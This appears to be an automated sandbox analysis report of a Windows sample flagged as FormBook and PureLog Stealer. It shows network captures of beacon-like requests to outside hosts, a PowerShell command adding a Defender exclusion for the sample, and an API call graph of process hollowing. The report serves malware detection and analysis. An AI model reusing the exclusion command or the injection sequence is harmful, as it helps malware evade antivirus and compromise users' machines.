                                                                                                                                                Data Ascii: ifzt=8Y7LUix1Mld3EkPkMxgAIqQHo7j6xU0ID//j04bHYJxCEv5EaJZ9FO2Cxpr1IVP7FwDSsQ2LZbGrSFCKXAFzeHmWfMgGoE3l7XS5KOJS8YPKhcSzBgj0OFAHrrPDjjXI9KKS1t+nY9DAm7t9dcSJmzMQXyzNXh9/7Mo+ssfl6rVXNicnhQyBBa5DHrq48WqDV3BOUBAQhmO4oMXKWwDxIVpnnsXZfcP3hObHhJG+QKnY+VaMF+HchtJefj0HsQDxjx78xXULjjridHNHK42HsczS6e2qRf5a8PTYgt3+2pC5KLQVIEBbqhtUN4fjNdw+ITAX0xG6+2F8j9rVwYTn7+QtMK6/ia6MuxGTTMgxOLzWhxlbrusPOx/mkvobH8jjCQlA6EZCio3lw54SzDs2n8s2VUcdNllkkRQ8JlwZ0s3zgoRdf+5qfANVpo3IwGQMbDmCdtGuFF8SaFdsCNfU5h8AVie7hUHL1dyoil9Vdspg9RU0VESrzlMWslo6x/BKSX4/sElwIz9jTQmEq5VEPhcn2uc7FW/609BN5yoqEP2/vZah7zUpFqMQnUnysAbE/9i/vQwWoTRK9ElapGv9b98Pj7UKhfRuGQ3VQGD12r0cCy6htJMgXmILcFIQs/GsfglIyCA9lr2ex3q4bY7U645KjYt6wPFawSg2LL6qE28IDMwnzP825vQlmkuQ9Q2YyCzO73a7YJvvw1jf5N0Pt4dstNkteAJ0RWk19ShAq5PqDDMRWfRs262XJZCYH1YFXeWxkZ76hz2jSbayauxsZt2PxC0DUIISjkNWlBIoODt9KLQlYdyW5QEA3wDbc8Kijb533vrSZaQB/GM6JPvXsTjpJqQ//aluIYR7Hqsv5UFfQ+x/aQQgpXkvbS4pHQnrm5ASt/JWTUfhFBRRpry1YaampbyZP4iR4/RsoxKMGnP9Wa52/xlgIrz3bhXf52vP+d4mT1yHnOtJCuacwrZfIKjSNnGol7RBim2sFdL+fr9Gqou [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:45:58.766074896 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                content-type: text/html
                                                                                                                                                content-length: 1251
                                                                                                                                                date: Mon, 25 Nov 2024 08:45:58 GMT
                                                                                                                                                server: LiteSpeed
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                                                                                Nov 25, 2024 09:45:58.766140938 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                                                                                Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                52192.168.2.450059107.167.84.42803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:46:00.236850023 CET516OUTGET /omhm/?ifzt=xaTrXXt9Kjd4VWfnLz4MLqEmpY3f+jxhDbzO0ePZZ/F2G9w3aeU7HujdvobedEDJNQrJvHKMILqdCxDRZi1zA3XNT5QIvXDZ0i+KO+cUgqjZuYPkfG7cBF4=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.cssa.auction
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:46:01.479526043 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                content-type: text/html
                                                                                                                                                content-length: 1251
                                                                                                                                                date: Mon, 25 Nov 2024 08:46:01 GMT
                                                                                                                                                server: LiteSpeed
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                                                                                Nov 25, 2024 09:46:01.479587078 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                                                                                Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:03:41:57
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Users\user\Desktop\IETC-24017.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\IETC-24017.exe"
                                                                                                                                                Imagebase:0x320000
                                                                                                                                                File size:768'512 bytes
                                                                                                                                                MD5 hash:2D9DA996EC68D0AC26B84D52A3298383
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1692106162.0000000006D90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1686417175.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:03:41:59
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe"
                                                                                                                                                Imagebase:0xce0000
                                                                                                                                                File size:433'152 bytes
                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:03:41:59
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Users\user\Desktop\IETC-24017.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\IETC-24017.exe"
                                                                                                                                                Imagebase:0xc00000
                                                                                                                                                File size:768'512 bytes
                                                                                                                                                MD5 hash:2D9DA996EC68D0AC26B84D52A3298383
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1822234803.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1824149461.0000000003920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:03:41:59
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:03:42:02
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                Imagebase:0x7ff693ab0000
                                                                                                                                                File size:496'640 bytes
                                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:03:42:06
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe"
                                                                                                                                                Imagebase:0xd10000
                                                                                                                                                File size:140'800 bytes
                                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4124804278.0000000004D20000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:03:42:08
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\openfiles.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\SysWOW64\openfiles.exe"
                                                                                                                                                Imagebase:0xa80000
                                                                                                                                                File size:60'416 bytes
                                                                                                                                                MD5 hash:50BD10A4C573E609A401114488299D3D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4124676785.0000000004740000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4124625092.00000000046F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:03:42:34
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                Imagebase:0x7ff6bf500000
                                                                                                                                                File size:676'768 bytes
                                                                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:11.9%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:2.9%
                                                                                                                                                  Total number of Nodes:314
                                                                                                                                                  Total number of Limit Nodes:11
                                                                                                                                                  execution_graph 39466 6ecc50c 39467 6ecc50f 39466->39467 39472 6ecd126 39467->39472 39491 6ecd0b0 39467->39491 39509 6ecd0c0 39467->39509 39468 6ecc4b7 39473 6ecd0b4 39472->39473 39475 6ecd129 39472->39475 39527 6ecdb76 39473->39527 39535 6ecd555 39473->39535 39540 6ecd6db 39473->39540 39545 6ecd758 39473->39545 39550 6ecd9b8 39473->39550 39558 6ecd4de 39473->39558 39562 6ecd85d 39473->39562 39570 6ecd607 39473->39570 39576 6ecdb0b 39473->39576 39584 6ecd5ca 39473->39584 39588 6ecdb48 39473->39588 39596 6ecda4d 39473->39596 39600 6ecdc2d 39473->39600 39605 6ecd893 39473->39605 39611 6ecd7b2 39473->39611 39475->39468 39492 6ecd0b4 39491->39492 39494 6ecdc2d 2 API calls 39492->39494 39495 6ecda4d 2 API calls 39492->39495 39496 6ecdb48 4 API calls 39492->39496 39497 6ecd5ca 2 API calls 39492->39497 39498 6ecdb0b 4 API calls 39492->39498 39499 6ecd607 4 API calls 39492->39499 39500 6ecd85d 4 API calls 39492->39500 39501 6ecd4de 2 API calls 39492->39501 39502 6ecd9b8 4 API calls 39492->39502 39503 6ecd758 2 API calls 39492->39503 39504 6ecd6db 2 API calls 39492->39504 39505 6ecd555 2 API calls 39492->39505 39506 6ecdb76 4 API calls 39492->39506 39507 6ecd7b2 2 API calls 39492->39507 39508 6ecd893 2 API calls 39492->39508 39493 6ecd0e2 39493->39468 39494->39493 39495->39493 39496->39493 39497->39493 39498->39493 39499->39493 39500->39493 39501->39493 39502->39493 39503->39493 39504->39493 39505->39493 39506->39493 39507->39493 39508->39493 39510 6ecd0da 39509->39510 39512 6ecdc2d 2 API calls 39510->39512 39513 6ecda4d 2 API calls 39510->39513 39514 6ecdb48 4 API calls 39510->39514 39515 6ecd5ca 2 API calls 39510->39515 39516 6ecdb0b 4 API calls 39510->39516 39517 6ecd607 4 API calls 39510->39517 39518 6ecd85d 4 API calls 39510->39518 39519 6ecd4de 2 API calls 39510->39519 39520 6ecd9b8 4 API calls 39510->39520 39521 6ecd758 2 API calls 39510->39521 39522 6ecd6db 2 API calls 39510->39522 39523 6ecd555 2 API calls 39510->39523 39524 6ecdb76 4 API calls 39510->39524 39525 6ecd7b2 2 API calls 39510->39525 39526 6ecd893 2 API calls 39510->39526 39511 6ecd0e2 39511->39468 39512->39511 39513->39511 39514->39511 39515->39511 39516->39511 39517->39511 39518->39511 39519->39511 39520->39511 39521->39511 39522->39511 39523->39511 39524->39511 39525->39511 39526->39511 39528 6ecd53d 39527->39528 39529 6ecd8b3 39528->39529 39530 6ecd82a 39528->39530 39624 6ecbaa9 39528->39624 39628 6ecbab0 39528->39628 39616 6ecbb69 39529->39616 39620 6ecbb70 39529->39620 39536 6ecd561 39535->39536 39538 6ecbb69 WriteProcessMemory 39536->39538 39539 6ecbb70 WriteProcessMemory 39536->39539 39537 6ecd0e2 39537->39468 39538->39537 39539->39537 39541 6ecd7b9 39540->39541 39632 6ecbc58 39541->39632 39636 6ecbc60 39541->39636 39542 6ecd7db 39546 6ecdbbb 39545->39546 39640 6ecb9d8 39546->39640 39644 6ecb9d0 39546->39644 39547 6ecdbd6 39552 6ecd53d 39550->39552 39551 6ecd8b3 39554 6ecbb69 WriteProcessMemory 39551->39554 39555 6ecbb70 WriteProcessMemory 39551->39555 39552->39551 39553 6ecd82a 39552->39553 39556 6ecbaa9 VirtualAllocEx 39552->39556 39557 6ecbab0 VirtualAllocEx 39552->39557 39554->39553 39555->39553 39556->39552 39557->39552 39648 6ecbded 39558->39648 39652 6ecbdf8 39558->39652 39563 6ecd86a 39562->39563 39565 6ecd53d 39562->39565 39566 6ecbb69 WriteProcessMemory 39563->39566 39567 6ecbb70 WriteProcessMemory 39563->39567 39564 6ecd82a 39565->39563 39565->39564 39568 6ecbaa9 VirtualAllocEx 39565->39568 39569 6ecbab0 VirtualAllocEx 39565->39569 39566->39564 39567->39564 39568->39565 39569->39565 39656 6ece2c8 39570->39656 39661 6ece2c1 39570->39661 39571 6ecd61f 39666 6ecb928 39571->39666 39670 6ecb920 39571->39670 39577 6ecd53d 39576->39577 39578 6ecd8b3 39577->39578 39579 6ecd82a 39577->39579 39582 6ecbaa9 VirtualAllocEx 39577->39582 39583 6ecbab0 VirtualAllocEx 39577->39583 39580 6ecbb69 WriteProcessMemory 39578->39580 39581 6ecbb70 WriteProcessMemory 39578->39581 39580->39579 39581->39579 39582->39577 39583->39577 39585 6ecd5d7 39584->39585 39586 6ecb928 ResumeThread 39585->39586 39587 6ecb920 ResumeThread 39585->39587 39586->39585 39587->39585 39589 6ecd53d 39588->39589 39590 6ecd8b3 39589->39590 39591 6ecd82a 39589->39591 39594 6ecbaa9 VirtualAllocEx 39589->39594 39595 6ecbab0 VirtualAllocEx 39589->39595 39592 6ecbb69 WriteProcessMemory 39590->39592 39593 6ecbb70 WriteProcessMemory 39590->39593 39592->39591 39593->39591 39594->39589 39595->39589 39597 6ecda17 39596->39597 39598 6ecb928 ResumeThread 39597->39598 39599 6ecb920 ResumeThread 39597->39599 39598->39597 39599->39597 39601 6ecdc33 39600->39601 39603 6ecbb69 WriteProcessMemory 39601->39603 39604 6ecbb70 WriteProcessMemory 39601->39604 39602 6ecdc68 39603->39602 39604->39602 39606 6ecd899 39605->39606 39607 6ecdd98 39606->39607 39609 6ecbb69 WriteProcessMemory 39606->39609 39610 6ecbb70 WriteProcessMemory 39606->39610 39608 6ecdc68 39609->39608 39610->39608 39612 6ecd7b8 39611->39612 39613 6ecd7db 39612->39613 39614 6ecbc58 ReadProcessMemory 39612->39614 39615 6ecbc60 ReadProcessMemory 39612->39615 39614->39613 39615->39613 39617 6ecbbde WriteProcessMemory 39616->39617 39619 6ecbb6e 39616->39619 39618 6ecbc0f 39617->39618 39618->39530 39619->39617 39621 6ecbbb8 WriteProcessMemory 39620->39621 39623 6ecbc0f 39621->39623 39623->39530 39625 6ecbab0 VirtualAllocEx 39624->39625 39627 6ecbb2d 39625->39627 39627->39528 39629 6ecbaf0 VirtualAllocEx 39628->39629 39631 6ecbb2d 39629->39631 39631->39528 39633 6ecbc60 ReadProcessMemory 39632->39633 39635 6ecbcef 39633->39635 39635->39542 39637 6ecbcab ReadProcessMemory 39636->39637 39639 6ecbcef 39637->39639 39639->39542 39641 6ecba1d Wow64SetThreadContext 39640->39641 39643 6ecba65 39641->39643 39643->39547 39645 6ecb9d8 Wow64SetThreadContext 39644->39645 39647 6ecba65 39645->39647 39647->39547 39649 6ecbe81 CreateProcessA 39648->39649 39651 6ecc043 39649->39651 39653 6ecbe81 CreateProcessA 39652->39653 39655 6ecc043 39653->39655 39657 6ece2dd 39656->39657 39659 6ecb9d8 Wow64SetThreadContext 39657->39659 39660 6ecb9d0 Wow64SetThreadContext 39657->39660 39658 6ece2f3 39658->39571 39659->39658 39660->39658 39662 6ece2c8 39661->39662 39664 6ecb9d8 Wow64SetThreadContext 39662->39664 39665 6ecb9d0 Wow64SetThreadContext 39662->39665 39663 6ece2f3 39663->39571 39664->39663 39665->39663 39667 6ecb968 ResumeThread 39666->39667 39669 6ecb999 39667->39669 39669->39571 39671 6ecb928 ResumeThread 39670->39671 39673 6ecb999 39671->39673 39673->39571 39434 4d14050 39435 4d14092 39434->39435 39437 4d14099 39434->39437 39436 4d140ea CallWindowProcW 39435->39436 39435->39437 39436->39437 39438 25cd418 39439 25cd45e 39438->39439 39443 25cd5f8 39439->39443 39446 25cd5e9 39439->39446 39440 25cd54b 39449 25cb770 39443->39449 39447 25cd626 39446->39447 39448 25cb770 DuplicateHandle 39446->39448 39447->39440 39448->39447 39450 25cd660 DuplicateHandle 39449->39450 39451 25cd626 39450->39451 39451->39440 39786 25c4668 39787 25c467a 39786->39787 39788 25c4686 39787->39788 39792 25c4778 39787->39792 39797 25c3e34 39788->39797 39790 25c46a5 39793 25c479d 39792->39793 39801 25c4888 39793->39801 39805 25c4879 39793->39805 39798 25c3e3f 39797->39798 39813 25c5c64 39798->39813 39800 25c6ff7 39800->39790 39803 25c48af 39801->39803 39802 25c498c 39802->39802 39803->39802 39809 25c44b4 39803->39809 39806 25c48af 39805->39806 39807 25c44b4 CreateActCtxA 39806->39807 39808 25c498c 39806->39808 39807->39808 39810 25c5918 CreateActCtxA 39809->39810 39812 25c59db 39810->39812 39814 25c5c6f 39813->39814 39817 25c5c84 39814->39817 39816 25c70c5 39816->39800 39818 25c5c8f 39817->39818 39821 25c5cb4 39818->39821 39820 25c71a2 39820->39816 39822 25c5cbf 39821->39822 39823 25c5ce4 2 API calls 39822->39823 39824 25c72a5 39823->39824 39824->39820 39674 4d17278 39675 4d172a5 39674->39675 39686 4d16994 39675->39686 39681 4d17395 39682 4d16994 2 API calls 39681->39682 39683 4d173c7 39682->39683 39684 4d17074 2 API calls 39683->39684 39685 4d173f9 39684->39685 39687 4d1699f 39686->39687 39699 4d17224 39687->39699 39689 4d17331 39690 4d17074 39689->39690 39691 4d1707f 39690->39691 39781 4d1df50 39691->39781 39693 4d17363 39694 4d17084 39693->39694 39695 4d1708f 39694->39695 39696 4d1fa03 39695->39696 39697 25c82ea 2 API calls 39695->39697 39698 25c5ce4 2 API calls 39695->39698 39696->39681 39697->39696 39698->39696 39700 4d1722f 39699->39700 39701 4d18472 39700->39701 39704 25c82ea 39700->39704 39711 25c5ce4 39700->39711 39701->39689 39705 25c82f8 39704->39705 39707 25c8350 39705->39707 39718 25c85f9 39705->39718 39706 25c85e9 39706->39701 39707->39706 39724 25ccd40 39707->39724 39729 25ccd50 39707->39729 39712 25c5cef 39711->39712 39714 25c8350 39712->39714 39715 25c85f9 2 API calls 39712->39715 39713 25c85e9 39713->39701 39714->39713 39716 25ccd50 2 API calls 39714->39716 39717 25ccd40 2 API calls 39714->39717 39715->39714 39716->39713 39717->39713 39719 25c85c5 39718->39719 39721 25c8607 39718->39721 39720 25c85e9 39719->39720 39722 25ccd50 2 API calls 39719->39722 39723 25ccd40 2 API calls 39719->39723 39720->39707 39721->39707 39722->39720 39723->39720 39725 25ccd71 39724->39725 39726 25ccd95 39725->39726 39734 25ccef1 39725->39734 39738 25ccf00 39725->39738 39726->39706 39730 25ccd71 39729->39730 39731 25ccd95 39730->39731 39732 25ccf00 2 API calls 39730->39732 39733 25ccef1 2 API calls 39730->39733 39731->39706 39732->39731 39733->39731 39735 25ccf0d 39734->39735 39736 25ccf47 39735->39736 39742 25cb760 39735->39742 39736->39726 39739 25ccf0d 39738->39739 39740 25ccf47 39739->39740 39741 25cb760 2 API calls 39739->39741 39740->39726 39741->39740 39743 25cb76b 39742->39743 39745 25cdc58 39743->39745 39746 25cd064 39743->39746 39745->39745 39747 25cd06f 39746->39747 39748 25c5ce4 2 API calls 39747->39748 39749 25cdcc7 39748->39749 39753 25cfa30 